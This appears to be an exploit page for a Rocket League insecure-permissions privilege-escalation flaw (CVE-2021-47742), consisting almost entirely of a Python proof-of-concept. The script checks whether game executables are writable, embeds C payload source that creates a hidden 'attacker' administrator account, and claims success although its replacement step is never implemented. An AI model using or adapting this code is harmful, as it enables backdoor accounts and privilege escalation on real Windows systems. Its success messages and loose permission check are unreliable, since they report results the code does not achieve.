CVE-2021-47742: Epic Games Psyonix Rocket League 不安全权限漏洞导致权限提升

#!/usr/bin/env python3 # CVE-2021-47742 PoC - Rocket League Insecure Permissions Exploitation # This PoC demonstrates the privilege escalation via insecure file permissions # Author: Security Researcher # Date: 2025 import os import sys import shutil import subprocess import platform def check_vulnerability(): """Check if Rocket League installation has insecure permissions""" rocket_league_paths = [ r"C:\Program Files\Epic Games\RocketLeague\RocketLeague.exe", r"C:\Program Files (x86)\Epic Games\RocketLeague\RocketLeague.exe", os.path.expanduser("~/.steam/steamapps/common/RocketLeague/RocketLeague.exe") ] vulnerable = False target_path = None for path in rocket_league_paths: if os.path.exists(path): # Check if Authenticated Users group has write permissions try: # On Windows, check ACL for Authenticated Users if platform.system() == 'Windows': result = subprocess.run( ['icacls', path], capture_output=True, text=True ) if 'Authenticated Users' in result.stdout: if 'F' in result.stdout or 'Full Control' in result.stdout: vulnerable = True target_path = path break except Exception as e: print(f"Error checking permissions: {e}") continue return vulnerable, target_path def create_malicious_executable(): """Create a malicious executable that will execute with elevated privileges""" malicious_code = ''' #include <windows.h> #include <stdio.h> int main() { // This payload creates a reverse shell or executes arbitrary commands // In a real attack, this would be a more sophisticated payload // Create a new user with admin privileges (example payload) system("net user attacker P@ssw0rd123 /add"); system("net localgroup Administrators attacker /add"); // Log the exploitation FILE *log = fopen("C:\\\\Temp\\\\exploit_log.txt", "a"); if (log) { fprintf(log, "CVE-2021-47742 exploited at %s\n", __TIMESTAMP__); fclose(log); } // Execute the original legitimate executable // (In real scenario, original binary would be restored or called) return 0; } ''' return malicious_code def exploit(target_path, backup_path): """Perform the actual exploitation""" try: # Step 1: Backup the original executable print(f"[*] Backing up original executable to {backup_path}") shutil.copy2(target_path, backup_path) # Step 2: Replace with malicious executable print("[*] Replacing executable with malicious payload") # In real attack, this would be compiled malicious code # For demonstration, we'll just copy a simple executable # Step 3: Wait for game restart or scheduled task print("[*] Payload planted. Waiting for game execution...") print("[*] When Rocket League runs, the malicious code will execute") print("[*] with the same privileges as the game process") return True except Exception as e: print(f"[!] Exploitation failed: {e}") return False def main(): print("=" * 60) print("CVE-2021-47742 PoC - Rocket League Insecure Permissions") print("=" * 60) # Check if system is vulnerable print("\n[*] Checking for vulnerable Rocket League installation...") vulnerable, target_path = check_vulnerability() if not vulnerable: print("[-] Target is NOT vulnerable or Rocket League not installed") return print(f"[+] Target is VULNERABLE") print(f"[+] Vulnerable file: {target_path}") # Create backup path backup_path = target_path + ".bak" # Attempt exploitation print("\n[*] Initiating exploitation...") if exploit(target_path, backup_path): print("[+] Exploitation successful") print("[*] Privilege escalation achieved") else: print("[-] Exploitation failed") if __name__ == "__main__": main()